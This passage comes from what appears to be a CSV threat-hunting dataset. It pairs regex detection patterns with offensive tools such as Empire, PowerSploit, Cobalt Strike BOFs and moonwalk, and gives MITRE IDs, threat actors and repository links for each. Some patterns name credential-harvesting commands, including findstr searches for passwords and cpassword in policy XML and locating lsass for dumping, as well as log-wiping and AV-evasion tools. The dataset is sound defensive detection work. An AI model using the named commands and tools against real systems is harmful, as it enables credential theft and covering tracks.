T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","PowerUp.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45097" "*Find-ProcessDLLHijack*",".{0,1000}Find\-ProcessDLLHijack.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral 
Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","N/A","10","10","91","20","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z","45098" "*Find-ProcessDLLHijack*",".{0,1000}Find\-ProcessDLLHijack.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45099" "*FindProcessTokenAndDuplicate*",".{0,1000}FindProcessTokenAndDuplicate.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","N/A","10","10","140","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z","45100" "*FindProcHandle *lsass*",".{0,1000}FindProcHandle\s.{0,1000}lsass.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/FindObjects-BOF","1","0","N/A","N/A","10","10","268","47","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z","45101" "*Find-ProtectionSoftware*",".{0,1000}Find\-ProtectionSoftware.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","45102" "*Find-PSScriptsInPSAppLog*",".{0,1000}Find\-PSScriptsInPSAppLog.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Get-ComputerDetails.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45103" "*Find-PSServiceAccounts.ps1*",".{0,1000}Find\-PSServiceAccounts\.ps1.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","45104" "*Find-RDPClientConnections*",".{0,1000}Find\-RDPClientConnections.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Get-ComputerDetails.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45105" "*Find-Secret -FilePath ./logs.txt -Regex *",".{0,1000}Find\-Secret\s\-FilePath\s\.\/logs\.txt\s\-Regex\s.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - 
T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","#linux","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","45106" "*FindSMB2UPTime.py*",".{0,1000}FindSMB2UPTime\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","45107" "*Findsploit*",".{0,1000}Findsploit.{0,1000}","offensive_tool_keyword","Findsploit","Finsploit is a simple bash script to quickly and easily search both local and online exploit databases. This repository also includes copysploit to copy any exploit-db exploit to the current directory and compilesploit to automatically compile and run any C exploit (ie. ./copysploit 1337.c && ./compilesploit 1337.c)","T1210 - T1105 - T1218","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/1N3/Findsploit","1","1","N/A","N/A","N/A","10","1729","330","2021-09-27T01:43:24Z","2015-03-16T16:15:55Z","45108" "*findstr *BEGIN CERTIFICATE*",".{0,1000}findstr\s.{0,1000}BEGIN\sCERTIFICATE.{0,1000}","offensive_tool_keyword","findstr","findstr used to find credentials","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","N/A","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A","45109" "*findstr *confidential*",".{0,1000}findstr\s.{0,1000}confidential.{0,1000}","offensive_tool_keyword","findstr","findstr used to find credentials","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","N/A","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A","45110" "*findstr *net 
use*",".{0,1000}findstr\s.{0,1000}net\suse.{0,1000}","offensive_tool_keyword","findstr","findstr used to find credentials","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","N/A","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A","45112" "*findstr *password*",".{0,1000}findstr\s.{0,1000}password.{0,1000}","offensive_tool_keyword","findstr","findstr used to find credentials","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","N/A","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A","45113" "*findstr /S /I cpassword *\policies\*.xml*",".{0,1000}findstr\s\/S\s\/I\scpassword\s.{0,1000}\\policies\\.{0,1000}\.xml.{0,1000}","offensive_tool_keyword","findstr","findstr used to find credentials","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","N/A","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A","45115" "*findstr lsass*",".{0,1000}findstr\slsass.{0,1000}","offensive_tool_keyword","findstr","findstr used to find lsass pid in order to dump lsass process","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","N/A","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","45119" "*findstr.exe Tvndrgaaa*",".{0,1000}findstr\.exe\sTvndrgaaa.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 
- T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","45120" "*Findsubdomains*",".{0,1000}Findsubdomains.{0,1000}","offensive_tool_keyword","findsubdomains","A subdomains discovery tool that collects all possible subdomains from open source internet and validates them through various tools to provide accurate results.","T1590 - T1591 - T1595 - T1596 - T1599","TA0011","N/A","N/A","Reconnaissance","https://findsubdomains.com/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","45121" "*Find-TrustedDocuments*",".{0,1000}Find\-TrustedDocuments.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Find-TrustedDocuments.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45122" "*Find-TrustedDocuments.ps1*",".{0,1000}Find\-TrustedDocuments\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1076","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45123" "*FindUncommonShares.git*",".{0,1000}FindUncommonShares\.git.{0,1000}","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","1","N/A","N/A","N/A","","N/A","","","","45124" "*FindUncommonShares.p*",".{0,1000}FindUncommonShares\.p.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds 
of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","45125" "*FindUncommonShares.py *",".{0,1000}FindUncommonShares\.py\s.{0,1000}","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","0","N/A","N/A","N/A","","N/A","","","","45126" "*FindUncommonShares-main*",".{0,1000}FindUncommonShares\-main.{0,1000}","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","1","N/A","N/A","N/A","","N/A","","","","45127" "*finduncshar_scan*",".{0,1000}finduncshar_scan.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","45128" "*Find-UnsafeLogonScriptPermissions.ps1*",".{0,1000}Find\-UnsafeLogonScriptPermissions\.ps1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential 
Access","https://github.com/techspence/ScriptSentry","1","1","N/A","N/A","7","6","502","43","2024-12-20T21:27:24Z","2023-07-22T03:17:58Z","45129" "*Find-UnsafeUNCPermissions -UNCScripts*",".{0,1000}Find\-UnsafeUNCPermissions\s\-UNCScripts.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","N/A","7","6","502","43","2024-12-20T21:27:24Z","2023-07-22T03:17:58Z","45130" "*Find-UnsafeUNCPermissions.ps1*",".{0,1000}Find\-UnsafeUNCPermissions\.ps1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","N/A","7","6","502","43","2024-12-20T21:27:24Z","2023-07-22T03:17:58Z","45131" "*Find-UserField -SearchField *",".{0,1000}Find\-UserField\s\-SearchField\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45132" "*Find-VacantComputer*",".{0,1000}Find\-VacantComputer.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. 
WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","N/A","10","813","146","2024-06-25T12:02:26Z","2016-05-24T14:00:14Z","45133" "*Find-WMILocalAdminAccess*",".{0,1000}Find\-WMILocalAdminAccess.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - 
INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45134" "*Finish moonwalk and clear your traces*",".{0,1000}Finish\smoonwalk\sand\sclear\syour\straces.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","#linux","N/A","10","10","1440","129","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z","45135" "*fir3d0g/mimidogz*",".{0,1000}fir3d0g\/mimidogz.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/projectb-temp/mimidogz","1","1","N/A","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z","45136" "*FireBuster.ps1*",".{0,1000}FireBuster\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
